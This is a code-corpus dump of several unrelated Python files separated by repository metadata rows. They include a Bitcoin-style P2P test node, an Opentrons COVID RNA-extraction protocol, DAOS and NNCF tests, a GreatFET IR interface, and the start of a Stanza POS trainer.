with mininode_lock:
self.deliver_sleep_time = value
def get_deliver_sleep_time(self):
with mininode_lock:
return self.deliver_sleep_time
# Spin until verack message is received from the node.
# Tests may want to use this as a signal that the test can begin.
# This can be called from the testing thread, so it needs to acquire the
# global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
def deliver(self, conn, message):
deliver_sleep = self.get_deliver_sleep_time()
if deliver_sleep is not None:
time.sleep(deliver_sleep)
with mininode_lock:
try:
getattr(self, 'on_' + message.command)(conn, message)
except:
print "ERROR delivering %s (%s)" % (repr(message),
sys.exc_info()[0])
def on_version(self, conn, message):
if message.nVersion >= 209:
conn.send_message(msg_verack())
conn.ver_send = min(MY_VERSION, message.nVersion)
if message.nVersion < 209:
conn.ver_recv = conn.ver_send
def on_verack(self, conn, message):
conn.ver_recv = conn.ver_send
self.verack_received = True
def on_inv(self, conn, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
conn.send_message(want)
def on_addr(self, conn, message): pass
def on_alert(self, conn, message): pass
def on_getdata(self, conn, message): pass
def on_getblocks(self, conn, message): pass
def on_tx(self, conn, message): pass
def on_block(self, conn, message): pass
def on_getaddr(self, conn, message): pass
def on_headers(self, conn, message): pass
def on_getheaders(self, conn, message): pass
def on_ping(self, conn, message):
if conn.ver_send > BIP0031_VERSION:
conn.send_message(msg_pong(message.nonce))
def on_reject(self, conn, message): pass
def on_close(self, conn): pass
def on_mempool(self, conn): pass
def on_pong(self, conn, message): pass
# More useful callbacks and functions for NodeConnCB's which have a single NodeConn
class SingleNodeConnCB(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
# The actual NodeConn class
# This class provides an interface for a p2p connection to a specified node
class NodeConn(asyncore.dispatcher):
messagemap = {
b"version": msg_version,
b"verack": msg_verack,
b"addr": msg_addr,
b"alert": msg_alert,
b"inv": msg_inv,
b"getdata": msg_getdata,
b"getblocks": msg_getblocks,
b"tx": msg_tx,
b"block": msg_block,
b"getaddr": msg_getaddr,
b"ping": msg_ping,
b"pong": msg_pong,
b"headers": msg_headers,
b"getheaders": msg_getheaders,
b"reject": msg_reject,
b"mempool": msg_mempool,
}
MAGIC_BYTES = {
"mainnet": b"\xbf\x0c\x6b\xbd", # mainnet
"testnet3": b"\xce\xe2\xca\xff", # testnet3
"regtest": b"\xfc\xc1\xb7\xdc" # regtest
}
def __init__(self, dstaddr, dstport, rpc, callback, net="regtest", services=1):
asyncore.dispatcher.__init__(self, map=mininode_socket_map)
self.log = logging.getLogger("NodeConn(%s:%d)" % (dstaddr, dstport))
self.dstaddr = dstaddr
self.dstport = dstport
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.sendbuf = b""
self.recvbuf = b""
self.ver_send = 209
self.ver_recv = 209
self.last_sent = 0
self.state = "connecting"
self.network = net
self.cb = callback
self.disconnect = False
# stuff version msg into sendbuf
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.send_message(vt, True)
print 'MiniNode: Connecting to GlobalMovementClub Node IP # ' + dstaddr + ':' \
+ str(dstport)
try:
self.connect((dstaddr, dstport))
except:
self.handle_close()
self.rpc = rpc
def show_debug_msg(self, msg):
self.log.debug(msg)
def handle_connect(self):
self.show_debug_msg("MiniNode: Connected & Listening: \n")
self.state = "connected"
def handle_close(self):
self.show_debug_msg("MiniNode: Closing Connection to %s:%d... "
% (self.dstaddr, self.dstport))
self.state = "closed"
self.recvbuf = b""
self.sendbuf = b""
try:
self.close()
except:
pass
self.cb.on_close(self)
def handle_read(self):
try:
t = self.recv(8192)
if len(t) > 0:
self.recvbuf += t
self.got_data()
except:
pass
def readable(self):
return True
def writable(self):
with mininode_lock:
length = len(self.sendbuf)
return (length > 0)
def handle_write(self):
with mininode_lock:
try:
sent = self.send(self.sendbuf)
except:
self.handle_close()
return
self.sendbuf = self.sendbuf[sent:]
def got_data(self):
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.MAGIC_BYTES[self.network]:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if self.ver_recv < 209:
if len(self.recvbuf) < 4 + 12 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = None
if len(self.recvbuf) < 4 + 12 + 4 + msglen:
return
msg = self.recvbuf[4+12+4:4+12+4+msglen]
self.recvbuf = self.recvbuf[4+12+4+msglen:]
else:
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command in self.messagemap:
f = BytesIO(msg)
t = self.messagemap[command]()
t.deserialize(f)
self.got_message(t)
else:
self.show_debug_msg("Unknown command: '" + command + "' " +
repr(msg))
except Exception as e:
print 'got_data:', repr(e)
def send_message(self, message, pushbuf=False):
if self.state != "connected" and not pushbuf:
return
self.show_debug_msg("Send %s" % repr(message))
command = message.command
data = message.serialize()
tmsg = self.MAGIC_BYTES[self.network]
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
if self.ver_send >= 209:
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
with mininode_lock:
self.sendbuf += tmsg
self.last_sent = time.time()
def got_message(self, message):
if message.command == b"version":
if message.nVersion <= BIP0031_VERSION:
self.messagemap[b'ping'] = msg_ping_prebip31
if self.last_sent + 30 * 60 < time.time():
self.send_message(self.messagemap[b'ping']())
self.show_debug_msg("Recv %s" % repr(message))
self.cb.deliver(self, message)
def disconnect_node(self):
self.disconnect = True
class NetworkThread(Thread):
def run(self):
while mininode_socket_map:
# We check for whether to disconnect outside of the asyncore
# loop to workaround the behavior of asyncore when using
# select
disconnected = []
for fd, obj in mininode_socket_map.items():
if obj.disconnect:
disconnected.append(obj)
[ obj.handle_close() for obj in disconnected ]
asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1)
# An exception we can raise if we detect a potential disconnect
# (p2p or rpc) before the test is complete
class EarlyDisconnectError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 29.240658 | 184 | 0.571235 |
36ccdfc9408f44a83650f8df3b4de8eac6b8533c | 302 | py | Python | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | [
"MIT"
] | 3 | 2020-03-12T21:42:59.000Z | 2020-03-18T02:42:22.000Z | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | [
"MIT"
] | null | null | null | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | [
"MIT"
] | null | null | null | from itertools import accumulate
from operator import mul
numbers = [1, 2, 3, 4, 5]
result1 = accumulate(numbers)
result2 = accumulate(numbers, mul)
result3 = accumulate(numbers, initial=100)
print(f"Result 1: {list(result1)}")
print(f"Result 2: {list(result2)}")
print(f"Result 3: {list(result3)}")
| 25.166667 | 42 | 0.725166 |
24bb4aa9ecdf5bd8a9e89ffd359137a9805b77c9 | 11,926 | py | Python | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | [
"Apache-2.0"
] | null | null | null | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | [
"Apache-2.0"
] | null | null | null | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | [
"Apache-2.0"
] | null | null | null | from opentrons.types import Point
import json
import os
import math
import threading
from time import sleep
metadata = {
'protocolName': 'USO_v6_station_b_M300_Pool_magmax',
'author': 'Nick <ndiehl@opentrons.com',
'apiLevel': '2.3'
}
NUM_SAMPLES = 96 # start with 8 samples, slowly increase to 48, then 94 (max is 64)
ELUTION_VOL = 50
STARTING_VOL = 540
WASH_VOL = 500
POOL = False
TIP_TRACK = False
PARK = True
# Definitions for deck light flashing
class CancellationToken:
def __init__(self):
self.is_continued = False
def set_true(self):
self.is_continued = True
def set_false(self):
self.is_continued = False
def turn_on_blinking_notification(hardware, pause):
while pause.is_continued:
hardware.set_lights(rails=True)
sleep(1)
hardware.set_lights(rails=False)
sleep(1)
def create_thread(ctx, cancel_token):
t1 = threading.Thread(target=turn_on_blinking_notification, args=(ctx._hw_manager.hardware, cancel_token))
t1.start()
return t1
# Start protocol
def run(ctx):
# Setup for flashing lights notification to empty trash
# cancellationToken = CancellationToken()
# load labware and pipettes
num_cols = math.ceil(NUM_SAMPLES/8)
tips300 = [ctx.load_labware('starlab_96_tiprack_300ul', slot, '200µl filtertiprack')
for slot in ['3', '6', '8', '9', '7']]
if PARK:
parkingrack = ctx.load_labware(
'starlab_96_tiprack_300ul', '10', 'empty tiprack for parking')
if POOL:
parking_spots = parkingrack.rows()[0]
else:
parking_spots = parkingrack.rows()[0][:num_cols]
else:
tips300.insert(0, ctx.load_labware('starlab_96_tiprack_300ul', '10',
'200µl filtertiprack'))
parking_spots = [None for none in range(12)]
m300 = ctx.load_instrument(
'p300_multi_gen2', 'left', tip_racks=tips300)
magdeck = ctx.load_module('magnetic module gen2', '4')
magdeck.disengage()
magheight = 6.5
magplate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
# magplate = magdeck.load_labware('biorad_96_wellplate_200ul_pcr')
tempdeck = ctx.load_module('Temperature Module Gen2', '1')
flatplate = tempdeck.load_labware(
'opentrons_96_aluminumblock_nest_wellplate_100ul',)
waste = ctx.load_labware('nest_1_reservoir_195ml', '11',
'Liquid Waste').wells()[0].top()
etoh = ctx.load_labware(
'nest_1_reservoir_195ml', '2', 'EtOH reservoir').wells()[0:]
res1 = ctx.load_labware(
'nest_12_reservoir_15ml', '5', 'reagent reservoir 1')
wash1 = res1.wells()[:4]
elution_solution = res1.wells()[-1]
if POOL:
mag_samples_m = magplate.rows()[0][:num_cols] + magplate.rows()[0][8:8+math.ceil(num_cols/2)]
elution_samples_m = flatplate.rows()[0][:num_cols] + flatplate.rows()[0][8:8+math.ceil(num_cols/2)]
else:
mag_samples_m = magplate.rows()[0][:num_cols]
elution_samples_m = flatplate.rows()[0][:num_cols]
magdeck.disengage() # just in case
#tempdeck.set_temperature(20)
m300.flow_rate.aspirate = 50
m300.flow_rate.dispense = 150
m300.flow_rate.blow_out = 300
folder_path = '/data/B'
tip_file_path = folder_path + '/tip_log.json'
tip_log = {'count': {}}
if TIP_TRACK and not ctx.is_simulating():
if os.path.isfile(tip_file_path):
with open(tip_file_path) as json_file:
data = json.load(json_file)
if 'tips300' in data:
tip_log['count'][m300] = data['tips300']
else:
tip_log['count'][m300] = 0
else:
tip_log['count'][m300] = 0
else:
tip_log['count'] = {m300: 0}
tip_log['tips'] = {
m300: [tip for rack in tips300 for tip in rack.rows()[0]]}
tip_log['max'] = {m300: len(tip_log['tips'][m300])}
def pick_up(pip, loc=None):
nonlocal tip_log
if tip_log['count'][pip] == tip_log['max'][pip] and not loc:
ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \
resuming.')
pip.reset_tipracks()
tip_log['count'][pip] = 0
if loc:
pip.pick_up_tip(loc)
else:
pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])
tip_log['count'][pip] += 1
switch = True
drop_count = 0
drop_threshold = 240 # number of tips trash will accommodate before prompting user to empty
def drop(pip):
nonlocal switch
nonlocal drop_count
side = 30 if switch else -18
drop_loc = ctx.loaded_labwares[12].wells()[0].top().move(
Point(x=side))
pip.drop_tip(drop_loc)
switch = not switch
drop_count += 8
if drop_count == drop_threshold:
# Setup for flashing lights notification to empty trash
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty tips from waste before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
drop_count = 0
waste_vol = 0
waste_threshold = 185000
def remove_supernatant(vol, park=False):
def waste_track(vol):
nonlocal waste_vol
if waste_vol + vol >= waste_threshold:
# Setup for flashing lights notification to empty liquid waste
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty liquid waste (slot 11) before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
waste_vol = 0
waste_vol += vol
m300.flow_rate.aspirate = 30
num_trans = math.ceil(vol/200)
vol_per_trans = vol/num_trans
for m, spot in zip(mag_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
for _ in range(num_trans):
waste_track(vol_per_trans)
if m300.current_volume > 0:
m300.dispense(m300.current_volume, m.top()) # void air gap if necessary
m300.move_to(m.center())
m300.transfer(vol_per_trans, loc, waste, new_tip='never',
air_gap=10)
#m300.blow_out(waste)
m300.air_gap(10)
drop(m300)
m300.flow_rate.aspirate = 50 # mudei de 150
def wash(wash_vol, source, mix_reps, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_vol/200)
vol_per_trans = wash_vol/num_trans
wash_vol_rem = wash_vol
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
src = source[i//(12//len(source))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source
m300.air_gap(20)
m300.mix(mix_reps, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_vol_rem+40, park=park) #+40
def wash_etoh(wash_etoh_vol, source_etoh, mix_reps_etoh, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_etoh_vol/200)
vol_per_trans = wash_etoh_vol/num_trans
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.5).move(Point(x=side*2.5)) # mudei de 0.5 3>2.5
src = source_etoh[i//(12//len(source_etoh))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source_etoh
m300.air_gap(20)
m300.mix(mix_reps_etoh, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_etoh_vol+40, park=park) #+40
def elute(vol, park=True):
# resuspend beads in elution
for m, spot in zip(mag_samples_m, parking_spots):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
m300.aspirate(vol, elution_solution)
m300.move_to(m.center())
m300.dispense(vol, loc)
m300.mix(10, 0.8*vol, loc)
m300.blow_out(m.bottom(5))
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
ctx.delay(minutes=5, msg='Incubating off magnet at room temperature \
for 5 minutes')
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on magnet at room temperature \
for 5 minutes')
for m, e, spot in zip(mag_samples_m, elution_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
m300.transfer(40, loc, e.bottom(5), air_gap=20, new_tip='never')
m300.blow_out(e.top(-2))
m300.air_gap(20)
m300.drop_tip()
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
# remove initial supernatant
m300.flow_rate.aspirate = 50
remove_supernatant(STARTING_VOL, park=PARK)
wash(WASH_VOL, wash1, 15, park=PARK)
#m300.flow_rate.aspirate = 94
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
magdeck.disengage()
ctx.delay(minutes=5, msg='Airdrying beads at room temperature for 5 \
minutes.')
m300.flow_rate.aspirate = 50
elute(ELUTION_VOL, park=PARK)
| 36.808642 | 110 | 0.582425 |
0177fcebd2550e61c6175ef81214f68f254fa7f3 | 6,740 | py | Python | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | [
"Apache-2.0"
] | null | null | null | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | [
"Apache-2.0"
] | 1 | 2018-10-22T17:06:02.000Z | 2018-10-29T05:08:00.000Z | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
'''
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
import os
import time
import traceback
import sys
import json
import uuid
from avocado import Test
from avocado import main
from avocado.utils import process
sys.path.append('./util')
sys.path.append('../util')
sys.path.append('../../../utils/py')
sys.path.append('./../../utils/py')
import ServerUtils
import WriteHostFile
from daos_api import DaosContext
from daos_api import DaosPool
from daos_api import DaosContainer
from daos_api import RankList
class OpenContainerTest(Test):
"""
Tests DAOS container bad create (non existing pool handle, bad uuid)
and close.
:avocado: tags=container,containeropen
"""
def setUp(self):
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
build_paths = json.load(f)
self.basepath = os.path.normpath(build_paths['PREFIX'] + "/../")
self.tmp = build_paths['PREFIX'] + '/tmp'
self.server_group = self.params.get("server_group",'/server/',
'daos_server')
# setup the DAOS python API
self.Context = DaosContext(build_paths['PREFIX'] + '/lib/')
self.POOL1 = None
self.POOL2 = None
self.CONTAINER1 = None
self.CONTAINER2 = None
self.hostfile = None
self.hostlist = self.params.get("test_machines",'/run/hosts/*')
self.hostfile = WriteHostFile.WriteHostFile(self.hostlist, self.tmp)
# common parameters used in pool create
self.createmode = self.params.get("mode",'/run/createtests/createmode/')
self.createsetid = self.params.get("setname",'/run/createtests/createset/')
self.createsize = self.params.get("size",'/run/createtests/createsize/')
# POOL 1 UID GID
self.createuid1 = self.params.get("uid",'/run/createtests/createuid1/')
self.creategid1 = self.params.get("gid",'/run/createtests/creategid1/')
# POOL 2 UID GID
self.createuid2 = self.params.get("uid",'/run/createtests/createuid2/')
self.creategid2 = self.params.get("gid",'/run/createtests/creategid2/')
ServerUtils.runServer(self.hostfile, self.server_group, self.basepath)
# give it time to start
time.sleep(2)
def tearDown(self):
if self.CONTAINER1 is not None:
self.CONTAINER1.destroy();
if self.CONTAINER2 is not None:
self.CONTAINER2.destroy();
if self.POOL1 is not None and self.POOL1.attached:
self.POOL1.destroy(1)
if self.POOL2 is not None and self.POOL2.attached:
self.POOL2.destroy(1)
ServerUtils.stopServer()
def test_container_open(self):
"""
Test basic container bad create.
:avocado: tags=container,containeropen
"""
expected_for_param = []
uuidlist = self.params.get("uuid",'/run/createtests/uuids/*/')
containerUUID = uuidlist[0]
expected_for_param.append(uuidlist[1])
pohlist = self.params.get("poh",'/run/createtests/handles/*/')
poh = pohlist[0]
expected_for_param.append(pohlist[1])
expected_result = 'PASS'
for result in expected_for_param:
if result == 'FAIL':
expected_result = 'FAIL'
break
try:
# create two pools and try to create containers in these pools
self.POOL1 = DaosPool(self.Context)
self.POOL1.create(self.createmode, self.createuid1, self.creategid1,
self.createsize, self.createsetid, None)
self.POOL2 = DaosPool(self.Context)
self.POOL2.create(self.createmode, self.createuid2, self.creategid2,
self.createsize, None, None)
# Connect to the pools
self.POOL1.connect(1 << 1)
self.POOL2.connect(1 << 1)
# defines pool handle for container open
if pohlist[0] == 'POOL1':
poh = self.POOL1.handle
else:
poh = self.POOL2.handle
# Create a container in POOL1
self.CONTAINER1 = DaosContainer(self.Context)
self.CONTAINER1.create(self.POOL1.handle)
# defines test UUID for container open
if uuidlist[0] == 'POOL1':
struuid = self.CONTAINER1.get_uuid_str()
containerUUID = uuid.UUID(struuid)
else:
if uuidlist[0] == 'MFUUID':
containerUUID = "misformed-uuid-0000"
else:
containerUUID = uuid.uuid4() # random uuid
# tries to open the container1
# open should be ok only if poh = POOL1.handle && containerUUID = CONTAINER1.uuid
self.CONTAINER1.open(poh, containerUUID)
# wait a few seconds and then destroy containers
time.sleep(5)
self.CONTAINER1.close()
self.CONTAINER1.destroy()
self.CONTAINER1 = None
# cleanup the pools
self.POOL1.disconnect()
self.POOL1.destroy(1)
self.POOL1 = None
self.POOL2.disconnect()
self.POOL2.destroy(1)
self.POOL2 = None
if expected_result in ['FAIL']:
self.fail("Test was expected to fail but it passed.\n")
except Exception as e:
print e
print traceback.format_exc()
if expected_result == 'PASS':
self.fail("Test was expected to pass but it failed.\n")
finally:
if self.hostfile is not None:
os.remove(self.hostfile)
if __name__ == "__main__":
main()
| 34.742268 | 93 | 0.617062 |
4157d0fb6b97e8d4648b6a9527374ba6e8e43f4a | 1,097 | py | Python | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | [
"BSD-3-Clause"
] | 2 | 2019-11-07T01:09:14.000Z | 2020-10-31T06:10:49.000Z | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | [
"BSD-3-Clause"
] | null | null | null | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | [
"BSD-3-Clause"
] | 1 | 2021-06-26T06:05:10.000Z | 2021-06-26T06:05:10.000Z |
#
# This file is part of GreatFET
#
import array
import usb
from ..interface import GreatFETInterface
from greatfet.protocol import vendor_requests
class SDIRTransceiver(GreatFETInterface):
"""
Data source for scanning out software-defined IR data.
"""
USB_TIMEOUT_ERRNO = 110
def __init__(self, board):
self.board = board
self.api = board.apis.sdir
self.running = False
def start_receive(self):
self.api.start_receive()
self.running = True
def stop(self):
self.api.stop()
self.running = False
def read(self, timeout=1000, max_data=0x4000, autostart=False, allow_timeout=False):
""" Reads all available samples from the GreatFET. """
if not self.running and autostart:
self.start_receive()
try:
return self.board.comms.device.read(0x81, max_data, timeout=timeout)
except usb.core.USBError as e:
if (e.errno == self.USB_TIMEOUT_ERRNO) and allow_timeout:
return None
else:
raise
| 21.94 | 88 | 0.62443 |
74fddb0ba016fed5f282df528360621ea913a9b1 | 3,216 | py | Python | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | [
"Apache-2.0"
] | null | null | null | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | [
"Apache-2.0"
] | null | null | null | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | [
"Apache-2.0"
] | null | null | null | import os
import subprocess
import pytest
import pathlib
import shutil
import torch
from tests.conftest import TEST_ROOT
from tests.test_sanity_sample import Command
EXTENSIONS_BUILD_FILENAME = 'extensions_build_checks.py'
@pytest.mark.parametrize("venv_type, package_type,install_type",
[('venv', 'develop', 'GPU')])
def test_force_cuda_build(tmp_venv_with_nncf, install_type, tmp_path, package_type):
'''
Check that CUDA Extensions weren't initially built and \
then with TORCH_CUDA_ARCH_LIST were forced to be built
'''
cuda_home = os.environ.get('CUDA_HOME') or os.environ.get('CUDA_PATH')
if cuda_home is None:
try:
nvcc = subprocess.check_output(['which', 'nvcc'])
cuda_home = os.path.dirname(os.path.dirname(nvcc))
except subprocess.CalledProcessError:
if not cuda_home:
cuda_home = '/usr/local/cuda'
if not os.path.exists(cuda_home):
cuda_home = None
if not cuda_home and not torch.cuda.is_available():
pytest.skip('There is no CUDA on the machine. The test will be skipped')
venv_path = tmp_venv_with_nncf
torch_build_dir = tmp_path / 'extensions'
export_env_variables = "export CUDA_VISIBLE_DEVICES='' export TORCH_EXTENSIONS_DIR={}".format(torch_build_dir)
python_executable_with_venv = ". {0}/bin/activate && {1} && {0}/bin/python".format(venv_path, export_env_variables)
run_path = tmp_path / 'run'
shutil.copy(TEST_ROOT / EXTENSIONS_BUILD_FILENAME, run_path)
torch_ext_dir = pathlib.Path(torch_build_dir)
assert not torch_ext_dir.exists()
mode = 'cpu'
command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode),
path=run_path)
command.run()
cpu_ext_dir = (torch_ext_dir / 'quantized_functions_cpu')
assert cpu_ext_dir.exists()
cpu_ext_so = (cpu_ext_dir / 'quantized_functions_cpu.so')
assert cpu_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda')
assert not cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so')
assert not cuda_ext_so.exists()
cpu_ext_dir = (torch_ext_dir / 'binarized_functions_cpu')
assert cpu_ext_dir.exists()
cpu_ext_so = (cpu_ext_dir / 'binarized_functions_cpu.so')
assert cpu_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda')
assert not cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so')
assert not cuda_ext_so.exists()
mode = 'cuda'
command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode),
path=run_path)
command.run()
cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda')
assert cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so')
assert cuda_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda')
assert cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so')
assert cuda_ext_so.exists()
| 35.733333 | 119 | 0.699938 |
0f3c5e55c0beb4a6904721a5ebaac967ed98eb25 | 6,019 | py | Python | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | [
"Apache-2.0"
] | null | null | null | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | [
"Apache-2.0"
] | null | null | null | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | [
"Apache-2.0"
] | null | null | null | """
A trainer class to handle training and testing of models.
"""
import sys
import logging
import torch
from torch import nn
from stanza.models.common.trainer import Trainer as BaseTrainer
from stanza.models.common import utils, loss
from stanza.models.pos.model import Tagger
from stanza.models.pos.vocab import MultiVocab
import onnx
import onnxruntime
logger = logging.getLogger('stanza')
def unpack_batch(batch, use_cuda):
""" Unpack a batch from the data loader. """
if use_cuda:
inputs = [b.cuda() if b is not None else None for b in batch[:8]]
else:
inputs = batch[:8]
orig_idx = batch[8]
word_orig_idx = batch[9]
sentlens = batch[10]
wordlens = batch[11]
return inputs, orig_idx, word_orig_idx, sentlens, wordlens
class Trainer(BaseTrainer):
""" A trainer for training models. """
def __init__(self, args=None, vocab=None, pretrain=None, model_file=None, use_cuda=False):
self.use_cuda = use_cuda
if model_file is not None:
# load everything from file
self.model_file = model_file
